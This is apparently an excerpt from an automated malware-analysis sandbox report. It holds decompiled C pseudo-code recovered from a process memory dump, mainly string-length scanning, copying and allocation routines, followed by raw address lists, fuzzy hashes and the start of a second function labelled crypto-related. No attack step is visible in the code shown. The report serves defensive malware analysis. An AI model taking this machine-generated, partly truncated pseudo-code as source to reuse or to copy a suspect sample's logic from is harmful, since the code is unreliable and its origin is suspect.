																			_t257 = _t257 + 8;
																			__eflags = _t257 - _t362;
																			if(_t257 < _t362) {
																				continue;
																			}
																			_t296 = 0;
																			__eflags = _t362 - 0x7fffffff;
																			if(_t362 >= 0x7fffffff) {
																				L112:
																				_t362 = 0x7fffffff;
																				L113:
																				_t260 = _t362 >> 0x0000001f & _t362;
																				_t365 = _t362 - _t260;
																				__eflags = _t407;
																				if(_t407 < 0) {
																					L115:
																					_t407 = _t365;
																					L116:
																					 *_t422 = _t296;
																					_t336 = _t335 + _t260 * 2;
																					_t422[1] = _t296;
																					__eflags = _t336;
																					if(_t336 == 0) {
																						L151:
																						_push(0x80);
																						_t399 = E008A1030();
																						_t447 = _t447 + 4;
																						_t337 =  *_t422;
																						__eflags = _t337;
																						if(_t337 == 0) {
																							 *_t399 = _t296;
																							goto L62;
																						}
																						__eflags = _t399;
																						if(_t399 == 0) {
																							L157:
																							_push(2);
																							_push(_t337);
																							E008A10B0();
																							_t447 = _t447 + 8;
																							goto L62;
																						}
																						_t366 =  *_t337 & 0x0000ffff;
																						 *_t399 = _t366;
																						__eflags = _t366;
																						if(_t366 == 0) {
																							goto L157;
																						}
																						_t367 = _t296;
																						while(1) {
																							_t367 = _t367 + 1;
																							_t263 =  *(_t337 + _t367 * 4 - 2) & 0x0000ffff;
																							 *(_t399 + _t367 * 4 - 2) = _t263;
																							__eflags = _t263;
																							if(_t263 == 0) {
																								goto L157;
																							}
																							_t264 =  *(_t337 + _t367 * 4) & 0x0000ffff;
																							 *(_t399 + _t367 * 4) = _t264;
																							__eflags = _t264;
																							if(_t264 != 0) {
																								continue;
																							}
																							goto L157;
																						}
																						goto L157;
																					}
																					__eflags =  *_t336 & 0x0000ffff;
																					if(( *_t336 & 0x0000ffff) == 0) {
																						goto L151;
																					}
																					__eflags = _t407;
																					if(_t407 != 0) {
																						L131:
																						_t159 = _t407 + 1; // 0x80000000
																						_t369 = _t159;
																						__eflags = _t369 - 0x40;
																						_t370 =  <=  ? 0x40 : _t369;
																						__eflags = _t370;
																						if(_t370 > 0) {
																							_t270 = (_t370 >> 5 >> 0x1a) + _t370 >> 6;
																							_t371 = _t370 & 0x8000003f;
																							__eflags = _t371;
																							if(_t371 < 0) {
																								_t371 = (_t371 - 0x00000001 | 0xffffffc0) + 1;
																								__eflags = _t371;
																							}
																							__eflags = _t371;
																							_t271 = _t270 + (_t296 & 0xffffff00 | _t371 > 0x00000000);
																							_v64 = _t271 << 6;
																							_push(_t271 << 7);
																							_v60 = _t336;
																							_t273 = E008A1030();
																							_t336 = _v60;
																							_t447 = _t447 + 4;
																							_t376 =  *_t422;
																							__eflags = _t376;
																							if(_t376 == 0) {
																								 *_t273 = _t296;
																								goto L143;
																							} else {
																								__eflags = _t273;
																								if(_t273 == 0) {
																									L141:
																									_push(2);
																									_push(_t376);
																									_v68 = _t273;
																									_v60 = _t336;
																									E008A10B0();
																									_t336 = _v60;
																									_t273 = _v68;
																									_t447 = _t447 + 8;
																									L143:
																									_t422[1] = _v64;
																									 *_t422 = _t273;
																									L144:
																									__eflags = _t273;
																									if(_t273 == 0) {
																										goto L63;
																									}
																									_t378 = _t296;
																									while(1) {
																										_t309 =  *_t336 & 0x0000ffff;
																										_t378 = _t378 + 1;
																										 *_t273 = _t309;
																										__eflags = _t407;
																										if(_t407 == 0) {
																											goto L149;
																										}
																										__eflags = _t378 - _t407;
																										if(_t378 == _t407) {
																											_t296 = 0;
																											 *(_t273 + 2) = 0;
																											goto L63;
																										}
																										L149:
																										__eflags = _t309;
																										if(_t309 == 0) {
																											_t296 = 0;
																											goto L63;
																										}
																										_t273 = _t273 + 2;
																										_t336 = _t336 + 2;
																										__eflags = _t336;
																									}
																								}
																								_t438 =  *_t376 & 0x0000ffff;
																								 *_t273 = _t438;
																								__eflags = _t438;
																								_t422 = _a4;
																								if(_t438 == 0) {
																									goto L141;
																								} else {
																									goto L138;
																								}
																								while(1) {
																									L138:
																									_t296 = _t296 + 1;
																									_t439 =  *(_t376 + _t296 * 4 - 2) & 0x0000ffff;
																									 *(_t273 + _t296 * 4 - 2) = _t439;
																									__eflags = _t439;
																									if(_t439 == 0) {
																										break;
																									}
																									_t440 =  *(_t376 + _t296 * 4) & 0x0000ffff;
																									 *(_t273 + _t296 * 4) = _t440;
																									__eflags = _t440;
																									if(_t440 != 0) {
																										continue;
																									}
																									break;
																								}
																								_t422 = _a4;
																								_t296 = 0;
																								__eflags = 0;
																								goto L141;
																							}
																						}
																						_t273 = _t296;
																						goto L144;
																					}
																					_t382 = _t336 & 0x0000000f;
																					__eflags = _t382;
																					if(_t382 == 0) {
																						L124:
																						_t407 =  ~( ~_t382 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t407;
																						while(1) {
																							asm("movdqu xmm1, [ecx+edx*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb eax, xmm1");
																							__eflags = _t260;
																							if(_t260 != 0) {
																								break;
																							}
																							_t382 = _t382 + 8;
																							__eflags = _t382 - _t407;
																							if(_t382 < _t407) {
																								continue;
																							}
																							__eflags = _t407 - 0x7fffffff;
																							if(_t407 >= 0x7fffffff) {
																								L130:
																								_t407 = 0x7fffffff;
																								goto L131;
																							} else {
																								goto L128;
																							}
																							while(1) {
																								L128:
																								__eflags =  *(_t336 + _t407 * 2) & 0x0000ffff;
																								if(( *(_t336 + _t407 * 2) & 0x0000ffff) == 0) {
																									goto L131;
																								}
																								_t407 = _t407 + 1;
																								__eflags = _t407 - 0x7fffffff;
																								if(_t407 < 0x7fffffff) {
																									continue;
																								}
																								goto L130;
																							}
																							goto L131;
																						}
																						asm("bsf edi, eax");
																						_t407 = (_t407 >> 1) + _t382;
																						goto L131;
																					}
																					_t407 = _t296;
																					__eflags = _t382 & 0x00000001;
																					if((_t382 & 0x00000001) != 0) {
																						goto L128;
																					}
																					_t382 =  ~_t382 + 0x10 >> 1;
																					__eflags = _t382;
																					while(1) {
																						_t260 =  *(_t336 + _t407 * 2) & 0x0000ffff;
																						__eflags = _t260;
																						if(_t260 == 0) {
																							goto L131;
																						}
																						_t407 = _t407 + 1;
																						__eflags = _t407 - _t382;
																						if(_t407 < _t382) {
																							continue;
																						}
																						goto L124;
																					}
																					goto L131;
																				}
																				__eflags = _t407 - _t365;
																				if(_t407 <= _t365) {
																					goto L116;
																				}
																				goto L115;
																			} else {
																				goto L110;
																			}
																			while(1) {
																				L110:
																				__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																				if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																					goto L113;
																				}
																				_t362 = _t362 + 1;
																				__eflags = _t362 - 0x7fffffff;
																				if(_t362 < 0x7fffffff) {
																					continue;
																				}
																				goto L112;
																			}
																			goto L113;
																		}
																		_t363 = _t296;
																		_t296 = 0;
																		asm("bsf edx, edx");
																		_t362 = (_t363 >> 1) + _t257;
																		goto L113;
																	}
																	_t362 = 0;
																	__eflags = _t257 & 0x00000001;
																	if((_t257 & 0x00000001) != 0) {
																		goto L110;
																	}
																	_t257 =  ~_t257 + 0x10 >> 1;
																	__eflags = _t257;
																	while(1) {
																		__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																		if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																			break;
																		}
																		_t362 = _t362 + 1;
																		__eflags = _t362 - _t257;
																		if(_t362 < _t257) {
																			continue;
																		}
																		_t296 = 0;
																		__eflags = 0;
																		goto L106;
																	}
																	_t296 = 0;
																	goto L113;
																}
																_push(0x80);
																 *_t422 = 0;
																_t422[1] = 0;
																_t399 = E008A1030();
																_t447 = _t447 + 4;
																_t338 =  *_t422;
																__eflags = _t338;
																if(_t338 == 0) {
																	 *_t399 = 0;
																	goto L62;
																}
																__eflags = _t399;
																if(_t399 == 0) {
																	L98:
																	_push(2);
																	_push(_t338);
																	E008A10B0();
																	_t447 = _t447 + 8;
																	goto L62;
																}
																_t386 =  *_t338 & 0x0000ffff;
																 *_t399 = _t386;
																__eflags = _t386;
																if(_t386 == 0) {
																	goto L98;
																}
																_t387 = 0;
																while(1) {
																	_t387 = _t387 + 1;
																	_t280 =  *(_t338 + _t387 * 4 - 2) & 0x0000ffff;
																	 *(_t399 + _t387 * 4 - 2) = _t280;
																	__eflags = _t280;
																	if(_t280 == 0) {
																		goto L98;
																	}
																	_t281 =  *(_t338 + _t387 * 4) & 0x0000ffff;
																	 *(_t399 + _t387 * 4) = _t281;
																	__eflags = _t281;
																	if(_t281 != 0) {
																		continue;
																	}
																	goto L98;
																}
																goto L98;
															}
															_t354 = _t354 + 1;
															__eflags = _t354 - _v68;
															if(_t354 < _v68) {
																continue;
															}
															goto L90;
														}
														_t356 = _t404 + 2;
														__eflags = _t356;
														if(_t356 == 0) {
															goto L53;
														}
														__eflags =  *(_t404 + 2) & 0x0000ffff;
														if(( *(_t404 + 2) & 0x0000ffff) == 0) {
															goto L53;
														}
														_v44 = _t404;
														_t255 = 0;
														__eflags = 0;
														while(1) {
															_t255 = _t255 + 1;
															_t404 = _v44 + _t255 * 2;
															_t331 =  *_t404 & 0x0000ffff;
															__eflags = ( *(_t356 + _t255 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t332 =  <=  ? _t331 + 0x20 : _t331;
															__eflags = ( <=  ? _t331 + 0x20 : _t331) - _v48;
															if(( <=  ? _t331 + 0x20 : _t331) == _v48) {
																break;
															}
															__eflags =  *(_t356 + _t255 * 2) & 0x0000ffff;
															if(( *(_t356 + _t255 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L53;
														}
														_t432 = _v64;
														_t299 = _v56;
														_t326 = _v52;
														goto L70;
													}
													_v32 = _t333;
													L163:
													__eflags = _t251;
													if(__eflags == 0) {
														goto L84;
													}
													if(__eflags > 0) {
														goto L85;
													}
													goto L90;
												}
												_t441 = _v32;
												_t353 = _t299;
												while(1) {
													__eflags =  *(_t441 + _t251 * 2) & 0x0000ffff;
													if(( *(_t441 + _t251 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t251 = _t251 + 1;
													__eflags = _t251 - _t299;
													if(_t251 < _t299) {
														continue;
													}
													_v32 = _t441;
													_t326 = _v52;
													goto L76;
												}
												_v32 = _t441;
												goto L163;
												L76:
												_t300 = _v32;
												_t248 =  ~( ~_t353 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t248;
												while(1) {
													asm("movdqu xmm1, [ebx+edx*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb ecx, xmm1");
													__eflags = _t326;
													if(_t326 != 0) {
														break;
													}
													_t353 = _t353 + 8;
													__eflags = _t353 - _t248;
													if(_t353 < _t248) {
														continue;
													}
													_v32 = _t300;
													__eflags = _t248 - 0x7fffffff;
													if(_t248 >= 0x7fffffff) {
														goto L84;
													}
													goto L80;
												}
												asm("bsf eax, eax");
												_v32 = _t300;
												_t251 = (_t326 >> 1) + _t353;
												goto L163;
											}
										}
										goto L40;
									}
									_t283 =  *_t321 & 0x0000ffff;
									 *_t421 = _t283;
									__eflags = _t283;
									if(_t283 == 0) {
										goto L34;
									}
									_v68 = _t398;
									_t284 = _t296;
									while(1) {
										_t284 = _t284 + 1;
										_t414 =  *(_t321 + _t284 * 4 - 2) & 0x0000ffff;
										 *(_t421 + _t284 * 4 - 2) = _t414;
										__eflags = _t414;
										if(_t414 == 0) {
											break;
										}
										_t415 =  *(_t321 + _t284 * 4) & 0x0000ffff;
										 *(_t421 + _t284 * 4) = _t415;
										__eflags = _t415;
										if(_t415 != 0) {
											continue;
										}
										break;
									}
									_t398 = _v68;
									goto L34;
								}
							}
							_t421 = _v40;
							goto L37;
						}
						_t288 = _t417 & 0x0000000f;
						__eflags = _t288;
						if(_t288 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t395 =  ~( ~_t288 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t395;
							while(1) {
								asm("movdqu xmm1, [esi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								__eflags = _t312;
								if(_t312 != 0) {
									break;
								}
								_t288 = _t288 + 8;
								__eflags = _t288 - _t395;
								if(_t288 < _t395) {
									continue;
								}
								__eflags = _t395 - 0x7fffffff;
								if(_t395 >= 0x7fffffff) {
									L22:
									_t418 = 0x40;
									_t345 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t417 + _t395 * 2) & 0x0000ffff;
									if(( *(_t417 + _t395 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t395 = _t395 + 1;
									__eflags = _t395 - 0x7fffffff;
									if(_t395 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L64:
								__eflags = _t345 - 0xfffffffe;
								if(_t345 != 0xfffffffe) {
									_t418 = 0x40;
								} else {
									 *_t417 = _t296;
									_t418 = _v36;
								}
								goto L23;
							}
							asm("bsf edx, ecx");
							_t345 = (_t395 >> 1) + _t288;
							goto L64;
						}
						_t395 = _t296;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							goto L20;
						}
						_t288 =  ~_t288 + 0x10 >> 1;
						__eflags = _t288;
						while(1) {
							_t312 =  *(_t417 + _t395 * 2) & 0x0000ffff;
							__eflags = _t312;
							if(_t312 == 0) {
								goto L64;
							}
							_t395 = _t395 + 1;
							__eflags = _t395 - _t288;
							if(_t395 < _t288) {
								continue;
							}
							goto L16;
						}
						goto L64;
					}
					_t227 =  &_v40;
					goto L38;
				}
				if(_t417 == 0) {
					L6:
					_push(2);
					_push(_t344);
					E008A10B0();
					_t447 = _t447 + 8;
					goto L8;
				}
				_t293 =  *_t344 & 0x0000ffff;
				 *_t417 = _t293;
				if(_t293 == 0) {
					goto L6;
				}
				_t294 = 0;
				while(1) {
					_t294 = _t294 + 1;
					_t312 =  *(_t344 + _t294 * 4 - 2) & 0x0000ffff;
					 *(_t417 + _t294 * 4 - 2) = _t312;
					if(_t312 == 0) {
						goto L6;
					}
					_t312 =  *(_t344 + _t294 * 4) & 0x0000ffff;
					 *(_t417 + _t294 * 4) = _t312;
					if(_t312 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x008aa660
0x008aa66c
0x008aa66e
0x008aa672
0x008aa674
0x008aa678
0x008aa682
0x008aa684
0x008aa687
0x008aa68d
0x008aa6c7
0x008aa6ca
0x008aa6ce
0x008aa6d6
0x008aa6dc
0x008aa6e7
0x008aa6e9
0x008aae6d
0x008aae72
0x008aa76d
0x008aa772
0x008aa772
0x008aa775
0x008aa778
0x008aa77b
0x008aa77d
0x008aa792
0x008aa795
0x008aa795
0x008aa79a
0x008aa7a2
0x008aa7a2
0x008aa7a2
0x008aa7a3
0x008aa7aa
0x008aa7b4
0x008aa7b8
0x008aa7b9
0x008aa7bd
0x008aa7c2
0x008aa7c6
0x008aa7c8
0x008aa7cb
0x008aa7cf
0x008aa7d1
0x008aa819
0x00000000
0x008aa7d3
0x008aa7d3
0x008aa7d5
0x008aa804
0x008aa804
0x008aa806
0x008aa807
0x008aa80b
0x008aa810
0x008aa814
0x008aa81c
0x008aa820
0x008aa824
0x008aa828
0x008aa82c
0x008aa830
0x008aa836
0x008aa83b
0x008aa83b
0x008aa83d
0x008aa842
0x008aa84b
0x008aa84b
0x008aa850
0x008aa852
0x008aa85a
0x008aa85c
0x008aa85f
0x008aa863
0x008aa8a0
0x008aa94a
0x008aa94a
0x008aa94c
0x008aa953
0x008aa953
0x008aa955
0x008aa959
0x008aa961
0x008aa967
0x008aa974
0x008aa974
0x008aa867
0x008aa890
0x008aa890
0x008aa892
0x008aa893
0x008aa898
0x00000000
0x008aa898
0x008aa869
0x008aa86c
0x008aa871
0x00000000
0x00000000
0x008aa873
0x008aa875
0x008aa875
0x008aa876
0x008aa87b
0x008aa882
0x00000000
0x00000000
0x008aa884
0x008aa888
0x008aa88e
0x00000000
0x00000000
0x00000000
0x008aa88e
0x00000000
0x008aa875
0x008aa844
0x008aa849
0x008aa8a8
0x008aa8aa
0x008aa8ac
0x008aa8f5
0x008aa8f5
0x008aa8fa
0x008aa8fc
0x008aa904
0x008aa906
0x008aa909
0x008aa90b
0x008aa90d
0x008aa947
0x00000000
0x008aa947
0x008aa90f
0x008aa911
0x008aa93a
0x008aa93a
0x008aa93c
0x008aa93d
0x008aa942
0x00000000
0x008aa942
0x008aa913
0x008aa916
0x008aa919
0x008aa91b
0x00000000
0x00000000
0x008aa91d
0x008aa91f
0x008aa91f
0x008aa920
0x008aa925
0x008aa92a
0x008aa92c
0x00000000
0x00000000
0x008aa92e
0x008aa932
0x008aa936
0x008aa938
0x00000000
0x00000000
0x00000000
0x008aa938
0x00000000
0x008aa91f
0x008aa8b1
0x008aa8b3
0x00000000
0x00000000
0x008aa8b5
0x008aa8bc
0x008aa8c2
0x008aa8c5
0x008aa8c7
0x008aa8ca
0x008aa8ce
0x008aa8ce
0x008aa8d5
0x008aa8db
0x008aa8de
0x008aa8e1
0x00000000
0x00000000
0x008aa8e7
0x008aa8ec
0x008aa8ee
0x00000000
0x00000000
0x008aa8f0
0x008aa8f0
0x008aa8f3
0x008aa8f3
0x00000000
0x008aa8f3
0x008aa992
0x008aa996
0x008aa999
0x008aa99c
0x008aa99e
0x008aa9a0
0x00000000
0x00000000
0x008aa9a8
0x008aa9ab
0x008aa9af
0x008aa9b7
0x008aa9bf
0x008aa9c3
0x008aa9c7
0x008aa9cb
0x008aa9cf
0x008aa9d3
0x008aa9d7
0x008aa9e7
0x008aa9e7
0x008aa9e7
0x008aa9e9
0x008aa9eb
0x00000000
0x00000000
0x008aa9ed
0x008aa9ef
0x008aa9f1
0x008aaa5a
0x008aaa5a
0x008aaa5e
0x008aaa62
0x008aaa64
0x00000000
0x00000000
0x008aaa6a
0x008aaa6b
0x008aaa70
0x00000000
0x00000000
0x008aaa72
0x008aaa7a
0x008aaa7a
0x008aaa7f
0x008aaa7f
0x008aaa82
0x008aaa82
0x008aaa84
0x008aaa88
0x008aaa8c
0x008aaa93
0x008aaa99
0x008aaa9f
0x008aaaa2
0x008aaaa8
0x008aaaab
0x008aaaae
0x00000000
0x00000000
0x008aaaba
0x008aaabc
0x008aaac4
0x008aaac4
0x008aaac8
0x008aaaca
0x008aaacd
0x008aaacf
0x00000000
0x00000000
0x008aaad5
0x008aaad5
0x008aaad7
0x008aaad9
0x008aab3a
0x008aab3a
0x008aab3d
0x008aab5f
0x008aab6b
0x008aab6b
0x008aab71
0x008aab71
0x008aab76
0x008aab7a
0x008aab7e
0x008aab80
0x00000000
0x00000000
0x008aab86
0x008aab89
0x008aab8b
0x00000000
0x00000000
0x008aab8d
0x008aab8f
0x008aab95
0x008aaba8
0x008aaba8
0x008aabad
0x008aabb2
0x008aabb4
0x008aabb6
0x008aabb8
0x008aabbe
0x008aabbe
0x008aabc0
0x008aabc0
0x008aabc2
0x008aabc5
0x008aabc8
0x008aabca
0x008aad2f
0x008aad2f
0x008aad39
0x008aad3b
0x008aad3e
0x008aad40
0x008aad42
0x008aad7f
0x00000000
0x008aad7f
0x008aad44
0x008aad46
0x008aad6f
0x008aad6f
0x008aad71
0x008aad72
0x008aad77
0x00000000
0x008aad77
0x008aad48
0x008aad4b
0x008aad4e
0x008aad50
0x00000000
0x00000000
0x008aad52
0x008aad54
0x008aad54
0x008aad55
0x008aad5a
0x008aad5f
0x008aad61
0x00000000
0x00000000
0x008aad63
0x008aad67
0x008aad6b
0x008aad6d
0x00000000
0x00000000
0x00000000
0x008aad6d
0x00000000
0x008aad54
0x008aabd3
0x008aabd5
0x00000000
0x00000000
0x008aabdb
0x008aabdd
0x008aac4d
0x008aac52
0x008aac52
0x008aac55
0x008aac58
0x008aac5b
0x008aac5d
0x008aac70
0x008aac73
0x008aac73
0x008aac79
0x008aac81
0x008aac81
0x008aac81
0x008aac82
0x008aac89
0x008aac93
0x008aac97
0x008aac98
0x008aac9c
0x008aaca1
0x008aaca5
0x008aaca8
0x008aacaa
0x008aacac
0x008aacfc
0x00000000
0x008aacae
0x008aacae
0x008aacb0
0x008aacdf
0x008aacdf
0x008aace1
0x008aace2
0x008aace6
0x008aacea
0x008aacef
0x008aacf3
0x008aacf7
0x008aacff
0x008aad03
0x008aad06
0x008aad08
0x008aad08
0x008aad0a
0x00000000
0x00000000
0x008aad10
0x008aad1a
0x008aad1a
0x008aad1d
0x008aad1e
0x008aad21
0x008aad23
0x00000000
0x00000000
0x008aad25
0x008aad27
0x008aad8e
0x008aad90
0x00000000
0x008aad90
0x008aad29
0x008aad29
0x008aad2b
0x008aad99
0x00000000
0x008aad99
0x008aad14
0x008aad17
0x008aad17
0x008aad17
0x008aad1a
0x008aacb2
0x008aacb5
0x008aacb8
0x008aacba
0x008aacbd
0x00000000
0x00000000
0x00000000
0x00000000
0x008aacbf
0x008aacbf
0x008aacbf
0x008aacc0
0x008aacc5
0x008aacca
0x008aaccc
0x00000000
0x00000000
0x008aacce
0x008aacd2
0x008aacd6
0x008aacd8
0x00000000
0x00000000
0x00000000
0x008aacd8
0x008aacda
0x008aacdd
0x008aacdd
0x00000000
0x008aacdd
0x008aacac
0x008aac5f
0x00000000
0x008aac5f
0x008aabe1
0x008aabe1
0x008aabe4
0x008aac01
0x008aac0d
0x008aac0d
0x008aac13
0x008aac13
0x008aac18
0x008aac1c
0x008aac20
0x008aac22
0x00000000
0x00000000
0x008aac28
0x008aac2b
0x008aac2d
0x00000000
0x00000000
0x008aac2f
0x008aac35
0x008aac48
0x008aac48
0x00000000
0x00000000
0x00000000
0x00000000
0x008aac37
0x008aac37
0x008aac3b
0x008aac3d
0x00000000
0x00000000
0x008aac3f
0x008aac40
0x008aac46
0x00000000
0x00000000
0x00000000
0x008aac46
0x00000000
0x008aac37
0x008aadbf
0x008aadc4
0x00000000
0x008aadc4
0x008aabe6
0x008aabe8
0x008aabeb
0x00000000
0x00000000
0x008aabf2
0x008aabf2
0x008aabf4
0x008aabf4
0x008aabf8
0x008aabfa
0x00000000
0x00000000
0x008aabfc
0x008aabfd
0x008aabff
0x00000000
0x00000000
0x00000000
0x008aabff
0x00000000
0x008aabf4
0x008aabba
0x008aabbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008aab97
0x008aab97
0x008aab9b
0x008aab9d
0x00000000
0x00000000
0x008aab9f
0x008aaba0
0x008aaba6
0x00000000
0x00000000
0x00000000
0x008aaba6
0x00000000
0x008aab97
0x008aadcb
0x008aadcd
0x008aadcf
0x008aadd4
0x00000000
0x008aadd4
0x008aab3f
0x008aab41
0x008aab43
0x00000000
0x00000000
0x008aab4a
0x008aab4a
0x008aab4c
0x008aab50
0x008aab52
0x00000000
0x00000000
0x008aab58
0x008aab59
0x008aab5b
0x00000000
0x00000000
0x008aab5d
0x008aab5d
0x00000000
0x008aab5d
0x008aad87
0x00000000
0x008aad87
0x008aaadb
0x008aaae0
0x008aaae2
0x008aaaea
0x008aaaec
0x008aaaef
0x008aaaf1
0x008aaaf3
0x008aab30
0x00000000
0x008aab30
0x008aaaf5
0x008aaaf7
0x008aab20
0x008aab20
0x008aab22
0x008aab23
0x008aab28
0x00000000
0x008aab28
0x008aaaf9
0x008aaafc
0x008aaaff
0x008aab01
0x00000000
0x00000000
0x008aab03
0x008aab05
0x008aab05
0x008aab06
0x008aab0b
0x008aab10
0x008aab12
0x00000000
0x00000000
0x008aab14
0x008aab18
0x008aab1c
0x008aab1e
0x00000000
0x00000000
0x00000000
0x008aab1e
0x00000000
0x008aab05
0x008aaabe
0x008aaabf
0x008aaac2
0x00000000
0x00000000
0x00000000
0x008aaac2
0x008aade9
0x008aade9
0x008aadec
0x00000000
0x00000000
0x008aadf6
0x008aadf8
0x00000000
0x00000000
0x008aadfe
0x008aae02
0x008aae02
0x008aae04
0x008aae04
0x008aae0e
0x008aae11
0x008aae17
0x008aae21
0x008aae24
0x008aae27
0x00000000
0x00000000
0x008aae31
0x008aae33
0x00000000
0x00000000
0x00000000
0x008aae35
0x008aa9db
0x008aa9df
0x008aa9e3
0x00000000
0x008aa9e3
0x008aae3a
0x008aadac
0x008aadac
0x008aadae
0x00000000
0x00000000
0x008aadb4
0x00000000
0x00000000
0x00000000
0x008aadba
0x008aa9f3
0x008aa9f7
0x008aa9f9
0x008aa9fd
0x008aa9ff
0x00000000
0x00000000
0x008aaa05
0x008aaa06
0x008aaa08
0x00000000
0x00000000
0x008aaa0a
0x008aaa12
0x00000000
0x008aaa12
0x008aada0
0x00000000
0x008aaa16
0x008aaa22
0x008aaa26
0x008aaa26
0x008aaa2b
0x008aaa2b
0x008aaa30
0x008aaa34
0x008aaa38
0x008aaa3a
0x00000000
0x00000000
0x008aaa40
0x008aaa43
0x008aaa45
0x00000000
0x00000000
0x008aaa47
0x008aaa53
0x008aaa58
0x00000000
0x00000000
0x00000000
0x008aaa58
0x008aae49
0x008aae4e
0x008aae52
0x00000000
0x008aae58
0x008aa9e7
0x00000000
0x008aa849
0x008aa7d7
0x008aa7da
0x008aa7dd
0x008aa7df
0x00000000
0x00000000
0x008aa7e1
0x008aa7e4
0x008aa7e6
0x008aa7e6
0x008aa7e7
0x008aa7ec
0x008aa7f1
0x008aa7f3
0x00000000
0x00000000
0x008aa7f5
0x008aa7f9
0x008aa7fd
0x008aa7ff
0x00000000
0x00000000
0x00000000
0x008aa7ff
0x008aa801
0x00000000
0x008aa801
0x008aa7d1
0x008aa77f
0x00000000
0x008aa77f
0x008aa6f1
0x008aa6f1
0x008aa6f4
0x008aa714
0x008aa718
0x008aa724
0x008aa724
0x008aa72a
0x008aa72a
0x008aa72f
0x008aa733
0x008aa737
0x008aa739
0x00000000
0x00000000
0x008aa73f
0x008aa742
0x008aa744
0x00000000
0x00000000
0x008aa746
0x008aa74c
0x008aa763
0x008aa763
0x008aa768
0x00000000
0x00000000
0x00000000
0x00000000
0x008aa74e
0x008aa74e
0x008aa752
0x008aa754
0x00000000
0x00000000
0x008aa75a
0x008aa75b
0x008aa761
0x00000000
0x00000000
0x00000000
0x008aa761
0x008aa977
0x008aa977
0x008aa97a
0x008aa988
0x008aa97c
0x008aa97c
0x008aa97f
0x008aa97f
0x00000000
0x008aa97a
0x008aae61
0x008aae66
0x00000000
0x008aae66
0x008aa6f6
0x008aa6f8
0x008aa6fa
0x00000000
0x00000000
0x008aa701
0x008aa701
0x008aa703
0x008aa703
0x008aa707
0x008aa709
0x00000000
0x00000000
0x008aa70f
0x008aa710
0x008aa712
0x00000000
0x00000000
0x00000000
0x008aa712
0x00000000
0x008aa703
0x008aa6de
0x00000000
0x008aa6de
0x008aa691
0x008aa6ba
0x008aa6ba
0x008aa6bc
0x008aa6bd
0x008aa6c2
0x00000000
0x008aa6c2
0x008aa693
0x008aa696
0x008aa69b
0x00000000
0x00000000
0x008aa69d
0x008aa69f
0x008aa69f
0x008aa6a0
0x008aa6a5
0x008aa6ac
0x00000000
0x00000000
0x008aa6ae
0x008aa6b2
0x008aa6b8
0x00000000
0x00000000
0x00000000
0x008aa6b8
0x00000000

Strings

@, xrefs: 008AA6CE

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction ID: 6fd69296f931b4a550cd41c4c384fc7b5333daa1adeec620f3a75841435721fa
Opcode Fuzzy Hash: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction Fuzzy Hash: 6D32D575A0471287E7288F29C45023AB3E2FFD6714B29862DE8A5D7E94EB35DC42C353

Uniqueness

Uniqueness Score: -1.00%

Function 008B1EB0, Relevance: 1.9, Strings: 1, Instructions: 682
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E008B1EB0(intOrPtr* __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t210;
				signed int _t211;
				signed int* _t217;
				char* _t221;
				signed int* _t222;
				intOrPtr _t227;
				signed int _t232;
				signed int _t235;
				signed int _t239;
				signed int _t241;
				signed int* _t247;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t265;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				char _t276;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t283;
				intOrPtr* _t286;
				signed int _t287;
				signed int _t291;
				signed int _t293;
				signed int _t294;
				void* _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t303;
				char _t304;
				char _t305;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				void* _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr* _t325;
				char _t326;
				signed int _t327;
				intOrPtr* _t329;
				signed int _t330;
				signed int _t331;
				void* _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				void* _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				void* _t343;
				intOrPtr* _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				char _t357;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				char _t368;
				char _t369;
				char _t370;
				signed int _t372;
